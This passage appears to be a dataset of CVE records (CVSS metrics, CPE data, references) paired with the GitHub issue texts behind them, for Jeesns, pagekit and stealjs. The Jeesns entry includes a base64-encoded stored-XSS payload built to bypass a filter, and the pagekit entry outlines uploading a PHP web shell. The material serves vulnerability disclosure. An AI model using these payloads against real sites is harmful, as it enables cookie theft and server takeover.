- [x] 受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue? | A XSS bug that can execute code(用户恶意修改 评论 的ua可触发XSS执行代码) | https://api.github.com/repos/xCss/Valine/issues/400/comments | 3 | 2022-06-21T06:13:26Z | 2022-10-11T08:44:36Z | https://github.com/xCss/Valine/issues/400 | 1,277,942,586 | 400 | 4,181 |
CVE-2022-38550 | 2022-09-19T23:15:09.247 | A stored cross-site scripting (XSS) vulnerability in the /weibo/list component of Jeesns v2.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Pick-program/JEESNS/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Pick-program/JEESNS/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeesns:jeesns:2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6771ECEB-00AE-4D70-BCEA-E6040665827E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Pick-program/JEESNS/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Pick-program",
"JEESNS"
] | Tools required: BurpSuite, IDEA (Eclipse)
Required source download address:
https://github.com/zchuanzhao/jeesns/releases
Deployment Instructions:
https://gitee.com/zchuanzhao/jeesns#%E9%83%A8%E7%BD%B2%E8%AF%B4%E6%98%8E


Posting Payload in the "Twitter" function:
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=></object>
The stored XSS vulnerability can be triggered (the XSS vulnerability can obtain the cookie value of others, so as to forge the identity of others to log in, which is risky) :
The code flow starts here at weibocontroller.java to get whether the user is logged in:

Then you call the XSS filter class, and the value you input will be checked for the following keywords. If there are any, the javascript statement will be disabled by underlining those sensitive words. This method can be circumvented by coding, such as payload, above. The < script > alert (" XSS ") < / script >
Base64 encoded into PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4 =
Use spurious protocol triggering to bypass detection:



| The JEESNS has a storage-type XSS vulnerability | https://api.github.com/repos/Pick-program/JEESNS/issues/1/comments | 0 | 2022-08-19T14:56:37Z | 2022-08-19T14:56:37Z | https://github.com/Pick-program/JEESNS/issues/1 | 1,344,554,018 | 1 | 4,182 |
CVE-2022-38916 | 2022-09-20T17:15:09.393 | A file upload vulnerability exists in the storage feature of pagekit 1.0.18, which allows an attacker to upload malicious files | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pagekit/pagekit/issues/970"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pagekit/pagekit/issues/970"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pagekit:pagekit:1.0.18:*:*:*:*:*:*:*",
"matchCriteriaId": "A1E39691-604C-42A3-BA30-80433E0E09EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/pagekit/pagekit/issues/970 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pagekit",
"pagekit"
] | <!--
Before submitting an issue, please try some troubleshooting steps:
- Enabled debug mode: https://pagekit.com/docs/troubleshooting/debug-mode
- Verify the server requirements: https://pagekit.com/docs/getting-started/requirements
- Disable all installed extensions
- Check the browser developer console for errors
-->
## Problem
A file upload vulnerability exists in the storage feature of pagekit 1.0.18, which allows an attacker to upload malicious files
## Technical Details
- Pagekit version:1.0.18
- Webserver:Nginx2.4.18
- Database:Mysql5.7.26
- PHP Version:7.3.4
- OS:Windows10
A file upload vulnerability exists in the storage feature of pagekit v1.0.18, which allows an attacker to upload malicious files
1. do not set allow php files to be uploaded

2. then select the upload point to upload the malicious php file and modify the packet via Burp Suite to change the file name

3. Upload the file successfully

4. The file can then be accessed at /storage/shell.php

| file upload vulnerability in pagekit 1.0.18 | https://api.github.com/repos/pagekit/pagekit/issues/970/comments | 0 | 2022-08-26T09:09:53Z | 2022-08-26T09:09:53Z | https://github.com/pagekit/pagekit/issues/970 | 1,351,985,961 | 970 | 4,183 |
CVE-2022-37259 | 2022-09-20T18:15:10.227 | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54124"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54129"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1528"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54124"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54129"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1528"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/stealjs/steal/issues/1528 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.
The ReDoS vulnerability can be mitigated with several best practices described here: https://snyk.io/blog/redos-and-catastrophic-backtracking/
| [CVE-2022-37259]/ReDos found in babel.js | https://api.github.com/repos/stealjs/steal/issues/1528/comments | 0 | 2022-09-14T09:21:22Z | 2022-09-14T09:21:22Z | https://github.com/stealjs/steal/issues/1528 | 1,372,647,305 | 1,528 | 4,184 |
CVE-2022-37265 | 2022-09-20T18:15:10.270 | Prototype pollution vulnerability in stealjs steal 2.2.4 via the alias variable in babel.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4216"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4569"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1534"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4569"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1534"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/stealjs/steal/issues/1534 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | Prototype pollution vulnerability in stealjs steal 2.2.4 via the alias variable in babel.js.
The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
| [CVE-2022-37265]/ Prototype pollution found in babel.js | https://api.github.com/repos/stealjs/steal/issues/1534/comments | 0 | 2022-09-14T09:47:08Z | 2022-09-14T09:47:08Z | https://github.com/stealjs/steal/issues/1534 | 1,372,684,258 | 1,534 | 4,185 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.